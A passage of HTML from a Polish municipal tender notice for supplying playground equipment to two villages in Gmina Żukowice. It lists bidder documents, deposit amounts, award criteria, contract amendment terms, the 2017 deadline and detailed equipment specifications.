              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik nr 2;
2) lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23, albo informacja o tym, że nie należy do grupy kapitałowej  załącznik nr 7;
3) wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty (Załącznik Nr 5);
4) opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. (Z polisy lub załączonych wraz z nią do oferty dokumentów musi wynikać, iż została ona opłacona zgodnie z warunkami płatności jakie zostały zawarte w treści polisy i musi być aktualna na dzień składania ofert).<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1) wypełniony i podpisany formularz ofertowy wg wzoru  załącznik Nr 1;
2) pełnomocnictwo podmiotów występujących wspólnie (jeżeli dotyczy);
3) pełnomocnictwo dla osoby/osób podpisującej ofertę i oświadczenia (jeśli uprawnienie tych osób nie wynika z innych dokumentów dołączonych do oferty);
4) zaparafowany projekt umowy;
5) dowód wniesienia wadium.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Każda oferta musi być zabezpieczona wadium w wysokości ustalonej dla danej części zamówienia, na którą składa się ofertę i tak:
Część I  1 200,00 zł (słownie: tysiąc dwieście złotych 00/100).
Część II  900,00  zł (słownie: dziewięćset złotych 0/100) 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa ryczałtowa</td><td>60</td></tr><tr><td>okres gwarancji i rękojmi za wady i usterki</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1) Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na  piśmie pod rygorem nieważności.
2) Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
3) Zmiany postanowień zawartej umowy mogą nastąpić w następującym zakresie i  przypadkach:
a) zdarzenia bądź ciąg zdarzeń obiektywnie niezależnych od Zamawiającego lub Dostawcy (których Zamawiający i Dostawca nie mogli przewidzieć i którym nie mogli zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działania z należytą starannością) zasadniczo utrudni wykonanie części zobowiązań umowy,  
b) zmiany ilości i asortymentu zamówienia , co skutkuje zmianą wynagrodzenia .
c) Wynikających z z art. 144 ust.1 ustawy pzp 
d) Wystąpią zmiany ustawowe wysokości stawki VAT.
4) Zamawiający dopuszcza możliwość zmiany ustaleń niniejszej umowy w stosunku do treści oferty Wykonawcy w zakresie zmiany parametrów, funkcji lub innych cech urządzeń zaoferowanych w ofercie  zmiana zaoferowanego urządzenia (marka, model, wersja urządzenia) , przy czym zmiana taka może być spowodowana:
a) niedostępnością na rynku urządzeń wskazanych w ofercie wynikającą z zaprzestania produkcji lub wycofaniem z rynku tych urządzeń po złożeniu oferty;
b) pojawieniem się na rynku urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów eksploatacji przedmiotu umowy;
c) pojawieniem się na rynku urządzeń o lepszych parametrach niż wskazane w ofercie,pod warunkiem, że zmiany wskazane powyżej nie spowodują zwiększenia ceny oferowanej,  a nowe urządzenie będzie spełniało wymagania określone  w specyfikacji istotnych warunków zamówienia.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 23/02/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Budowa placu zabaw w miejscowości Kłoda<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Plac zabaw znajduje się na działce nr 269/1 w  miejscowości Kłoda, Gmina Żukowice. Teren jest ogrodzony 
i przygotowany do montażu nowych urządzeń na nawierzchni z piasku. Wymiar placu zabaw 13,9 m x 29,1 m. Do oferty należy dołączyć koncepcję rozmieszczenia  wskazana wizja w terenie (strefy bezpieczeństwa)  Zakres obejmuje wyposażenie placu zabaw w następujące urządzenia i elementy małej architektury:
a) Zestaw zabawowy. Urządzenie składające się z : dwóch kwadratowych zadaszonych wież z daszkami w kształcie ostrosłupów, pomostu z barierkami z lin stanowiącego przejście między wieżami, wejść na podesty w postaci drabinki łukowej oraz skośnej ścianki wspinaczkowej wyposażonej dodatkowo w linę asekuracyjną, przejścia tunelowego z wyższej wieży do ścianki wspinaczkowej, - zjazdu strażackiego. 
- Wymiary: 364 x 600 cm; strefa bezpieczeństwa: 711 x 905 cm; wysokość całkowita: 364 cm; wysokość podestu: 90, 140 cm; Wysokość swobodnego upadku: 150 cm.
- Konstrukcja - Stal (rury 88.9, 42.4, 33.7 mm), cynkowane, dwukrotnie malowane proszkowo.
- Ślizg - Stal nierdzewna, burty polietylen.
- Ścianki - Płyta polietylenowa HDPE całkowicie odporna na działanie warunków   atmosferycznych.
- Dach - Tworzywo kompozytowe.
- Liny - Syntetyczne - 16 mm z rdzeniem stalowym.
- Tunel - Rura polietylenowa PE (630 mm).
- Podest, płyta wspinaczkowa - Antypoślizgowa płyta wodoodporna.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach. 
- Zaślepki rur - guma amortyzująca.
- Kotwienie - Zabetonowane 70 cm w gruncie.
b) Piaskownica sześciokątna.  Urządzenie składa się z: - sześciu ścianek o pofalowanej górnej krawędzi, sześciu mocujących słupków z rur, sześciu siedzisk mocowanych w narożnikach do słupków. Urządzenie składa się z: - sześciu ścianek o pofalowanej górnej krawędzi, sześciu mocujących słupków z rur, sześciu siedzisk mocowanych w narożnikach do słupków.
- Konstrukcja - Stal cynkowana, dwukrotnie malowana proszkowo.
- Ścianki, siedziska - Płyta polietylenowa HDPE całkowicie odporna na działanie warunków atmosferycznych.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych   nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Kotwienie - Zabetonowane 50 cm w gruncie.
c) Huśtawka podwójna.  Urządzenie składa się z: - poprzeczki, czterech skośnych słupów podporowych, - czterech zawiesi, - dwóch siedzisk podwieszonych na łańcuchach (siedziska: 1xkubełkowe dla małych dzieci, 1x płaskie - deseczka). 
- Wymiary: 395 x 232 cm. 
- Strefa bezpieczeństwa: nawierzchnia sypka 315 x 750 cm; nawierzchnia syntetyczna 315 x 650 cm.; wysokość całkowita: 228 cm; wysokość swobodnego upadku: 128 cm.
- Konstrukcja - Stal cynkowana, dwukrotnie malowana proszkowo.
- Zawiesia - Stal nierdzewna z zestawem dwóch łożysk.
- Łańcuch - Łańcuch stalowy, cynkowany.
- Siedziska -  Siedzisko płaskie - deseczka oraz kubełkowe  konstrukcja aluminiowa oblana gumą, siedzisko gumowe - elastyczne  guma.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych  nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Kotwienie - Zabetonowane 70 cm w gruncie.
d) Huśtawka wagowa. Urządzenie składa się z: - poprzeczki z zamocowanymi dwoma siedziskami i dwoma uchwytami w kształcie pierścieni; - podstawy w kształcie dwóch trójkątów; - dwóch trójkątnych ścianek mocowanych do podstawy, mechanizmu obrotowy.
- Wymiary: 37 x 264 cm; strefa bezpieczeństwa: 260 x 500 cm; wysokość całkowita: 114 cm; wysokość swobodnego upadku: 99 cm.
- Konstrukcja - Stal cynkowana, dwukrotnie malowana proszkowo.
- Mechanizm obrotowy - Stalowy oparty na zestawie dwóch łożysk.
- Ścianki i siedziska - Płyta polietylenowa HDPE całkowicie odporna na działanie warunków atmosferycznych.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Kotwienie - Zabetonowane 85 cm w gruncie.
e) Bujak konik. Urządzenie składa się z: - siedziska; - rączek i podpórek pod nogi; - korpusu 
w kształcie konika; - sprężyny; - ramy do kotwienia w gruncie. 
- Wymiary: 27 x 103 cm; strefa bezpieczeństwa: 327 x 415 cm; wysokość całkowita: 94 cm; wysokość swobodnego upadku: 50 cm.
- Rączki i podpórki po nóżki - Polietylen z rdzeniem stalowym.
- Rama do kotwienia - Stal cynkowana ogniowo.
- Siedzisko, korpus - płyta polietylenowa HDPE całkowicie odporna na działanie warunków atmosferycznych.
- Sprężyna - Stal sprężynowa, dwukrotnie malowana proszkowo.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Kotwienie - Zabetonowane 40 cm w gruncie.
f) Karuzela z kierownicą. Karuzela platformowa. Podstawa karuzeli oraz słup z kierownicą do kręcenia znajdujący się w osi, wykonane ze stali konstrukcyjnej, oczyszczonej w procesie piaskowania. Zabezpieczone przed korozją przez cynkowanie i malowanie proszkowe, farbami poliestrowymi odpornymi na promieniowanie UV. Poręcz stanowiąca jednocześnie oparcie wykonana ze stali nierdzewnej połączonej przy użyciu aluminiowych klamer. Siedzisko umieszczone na obwodzie karuzeli wykonane z płyty HPL. Platforma karuzeli płyta HPL z wyfrezowanymi rowkami w kształcie pajęczyny. 
- Wymiary urządzenia: 150 x 150 cm; wysokość 70 cm; strefa bezpieczeństwa 550 x 550 cm; maksymalna wysokość swobodnego upadku 70 cm.
g) Ławka  2 szt. Ławka składa się z: - dwóch stelaży pełniących jednocześnie funkcje podparcia bocznego; - siedziska; - oparcia.
- Wymiary: ok. 60 x 177 cm. Wysokość całkowita: ok. 80 cm. 
- Stelaże - Stal cynkowana, dwukrotnie malowana proszkowo.
- Siedzisko, oparcie - Drewno bezrdzeniowe  impregnowane.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.	
- Kotwienie - Zabetonowane 75 cm w gruncie.
h) Tablica regulaminowa. Tablica składa się z: - ramy w kształcie odwróconej litery U; - tablicy;
- Wymiary: ok. 42,4 x 68,5 cm; wysokość całkowita: ok. 200 cm.
- Rama - Stal cynkowana, dwukrotnie malowana proszkowo.
- Tablica - Blacha ocynkowana.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie war. zewn. nierdzewne,  od strony wewn. w plastikowych zaślepkach.
- Kotwienie -  Zabetonowane 60 cm w gruncie.
i) Kosz na śmieci  2 szt.  Kosz składa się z: - ramy w kształcie odwróconej litery U; - daszka;- kosza w kształcie walca z perforowaną ścianką o pojemności 35 l. 
- Wymiary: ok. 40 x 31 cm; wysokość całkowita: ok. 92 cm.
- Rama - Stal cynkowana, dwukrotnie malowana proszkowo.
- Kosz, daszek - Blacha stalowa cynkowana, dwukrotnie malowana proszkowo.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Kotwienie  Zabetonowane 50 cm w gruncie.

Urządzenia placu zabaw i małej architektury powinny posiadać odpowiednie certyfikaty i być osadzone w ziemi na prefabrykowanych betonowych elementach w sposób przewidziany przez producenta, w sposób gwarantujący bezpieczeństwo ich użytkowania. Wszystkie urządzenia powinny posiadać Certyfikat Zgodności z normami serii PN EN 1176:2009. Producent powinien zapewnić części zamienne oraz serwis pogwarancyjny. Urządzenia powinny być zamontowane z zachowaniem stref bezpieczeństwa wynikających z norm PN EN 1176;2008.
 W opisie  podano przykładowe urządzenia; dopuszcza się inne typy urządzeń pod warunkiem zachowania kompozycji i konstrukcji urządzeń, parametrów technicznych i materiałowych oraz stref bezpieczeństwa. Wizualizacja urządzeń oraz wizja w terenie. 

Uwaga:
Wykonawca przed złożeniem oferty zobowiązany jest do zapoznania się z zakresem robót na miejscu ich wykonania.

Wykonawca jest zobowiązany w cenie ofertowej uwzględnić wszystkie koszty niezbędne do prawidłowej realizacji zamówienia. 
Wszystkie materiały powinny być fabrycznie nowe, tzn. że żadna część składająca się na dany materiał nie może być wcześniej używana oraz winny posiadać niezbędne certyfikaty bezpieczeństwa, deklaracje zgodności i atesty dopuszczające do użytku, muszą odpowiadać wymaganiom zawartym w SIWZ jak również muszą być dopuszczone do obrotu i stosowania w krajach UE. Zamawiający informuje, że przedmiot zamówienia jest opisany w SIWZ przez wskazanie znaków towarowych, patentów lub pochodzenia wskazaniu takiemu towarzyszą wyrazy lub równoważny lub za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1 i 3 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Oferta równoważna to taka, która przedstawia przedmiot zamówienia o właściwościach funkcjonalnych i jakościowych takich samych lub zbliżonych do tych, które zostały określone w SIWZ, lecz oznaczonych innym znakiem towarowym, patentem lub pochodzeniem, gwarantująca wykonanie zamówienia oraz zapewniająca uzyskanie nie gorszych parametrów technicznych. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty spełniają wymagania określone przez Zamawiającego.
Wykonawca zobowiązuje się do udzielenia gwarancji i rękojmi na przedmiot zamówienia na okres 5 lat od daty odbioru końcowego. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>37535200-9, 45112723-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/05/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ofertowa ryczałtowa</td><td>60</td></tr><tr><td>okres gwarancji i rękojmi za wady i usterki</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Doposażenie placu zabaw w miejscowości Dobrzejowice<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Plac zabaw znajduje się na  działce nr 189 w m. Dobrzejowice, Gmina Żukowice. Plac zabaw częściowo jest już wyposażony, należy dostosować nowy sprzęt do lokalizacji. Do oferty należy dołączyć koncepcję rozmieszczenia  wskazana wizja w terenie (strefy bezpieczeństwa). Zakres obejmuje wyposażenie placu zabaw w następujące urządzenia i elementy małej architektury:
a) Zestaw zabawowy, tj. urządzenie składające się z: dwóch kwadratowych zadaszonych wież z daszkami w kształcie ostrosłupów; pomostu z barierkami z lin stanowiącego przejście między wieżami; wejść na podesty w postaci drabinki łukowej oraz skośnej ścianki wspinaczkowej wyposażonej dodatkowo w linę asekuracyjną; przejścia tunelowego z wyższej wieży do ścianki wspinaczkowej - zjazdu strażackiego. 
- Wymiary: 364 x 600 cm; strefa bezpieczeństwa: 711 x 905 cm; wysokość całkowita: 364 cm; wysokość podestu: 90, 140 cm; wysokość swobodnego upadku: 150 cm.
- Konstrukcja - Stal (rury 88.9, 42.4, 33.7 mm), cynkowane, dwukrotnie malowane proszkowo.
- Ślizg - Stal nierdzewna, burty polietylen.
- Ścianki - Płyta polietylenowa HDPE całkowicie odporna na działanie warunków   atmosferycznych.
- Dach - Tworzywo kompozytowe.
- Liny - Syntetyczne - 16 mm z rdzeniem stalowym.
- Tunel - Rura polietylenowa PE (630 mm).
- Podest, płyta wspinaczkowa - Antypoślizgowa płyta wodoodporna.
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.
- Zaślepki rur - guma amortyzująca.
- Kotwienie - Zabetonowane 70 cm w gruncie.
b) Ławka  1 szt. Ławka składa się z: - dwóch stelaży pełniących jednocześnie funkcje podparcia bocznego; - siedziska; - oparcia.
- Wymiary: ok. 60 x 177 cm; wysokość całkowita: ok. 80 cm. 
- Stelaże - Stal cynkowana, dwukrotnie malowana proszkowo.
- Siedzisko, oparcie - Drewno bezrdzeniowe  impregnowane
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych  nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.	
c) Ławka  2 szt. Ławka składa się z: - dwóch stelaży pełniących jednocześnie funkcje podparcia   Bocznego; - siedziska; - bez oparcia.
- Wymiary: ok. 60 x 177 cm; wysokość całkowita: ok. 80 cm. 
- Stelaże - Stal cynkowana, dwukrotnie malowana proszkowo.
- Siedzisko, oparcie - Drewno bezrdzeniowe  impregnowane
- Śruby - Wszelkie śruby i mocowania wystawione na działanie warunków zewnętrznych nierdzewne, od strony wewnętrznej w plastikowych zaślepkach.	

Urządzenia placu zabaw i małej architektury powinny posiadać odpowiednie certyfikaty i być osadzone w ziemi na prefabrykowanych betonowych elementach w sposób przewidziany przez producenta, w sposób gwarantujący bezpieczeństwo ich użytkowania. Wszystkie urządzenia powinny posiadać Certyfikat Zgodności z normami serii PN EN 1176:2009. Producent powinien zapewnić części zamienne oraz serwis pogwarancyjny. Urządzenia powinny być zamontowane z zachowaniem stref bezpieczeństwa wynikających z norm PN EN 1176;2008.
 W opisie  podano przykładowe urządzenia; dopuszcza się inne typy urządzeń pod warunkiem zachowania kompozycji i konstrukcji urządzeń, parametrów technicznych i materiałowych oraz stref bezpieczeństwa. Wizualizacja urządzeń oraz wizja w terenie. 

Uwaga:
Wykonawca przed złożeniem oferty zobowiązany jest do zapoznania się z zakresem robót na miejscu ich wykonania.

Wykonawca jest zobowiązany w cenie ofertowej uwzględnić wszystkie koszty niezbędne do prawidłowej realizacji zamówienia. 
Wszystkie materiały powinny być fabrycznie nowe, tzn. że żadna część składająca się na dany materiał nie może być wcześniej używana oraz winny posiadać niezbędne certyfikaty bezpieczeństwa, deklaracje zgodności i atesty dopuszczające do użytku, muszą odpowiadać wymaganiom zawartym w SIWZ jak również muszą być dopuszczone do obrotu i stosowania w krajach UE. Zamawiający informuje, że przedmiot zamówienia jest opisany w SIWZ przez wskazanie znaków towarowych, patentów lub pochodzenia wskazaniu takiemu towarzyszą wyrazy lub równoważny lub za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1 i 3 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Oferta równoważna to taka, która przedstawia przedmiot zamówienia o właściwościach funkcjonalnych i jakościowych takich samych lub zbliżonych do tych, które zostały określone w SIWZ, lecz oznaczonych innym znakiem towarowym, patentem lub pochodzeniem, gwarantująca wykonanie zamówienia oraz zapewniająca uzyskanie nie gorszych parametrów technicznych. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego roboty spełniają wymagania określone przez Zamawiającego.
Wykonawca zobowiązuje się do udzielenia gwarancji i rękojmi na przedmiot zamówienia na okres 5 lat od daty odbioru końcowego. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>37535200-9, 45112723-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
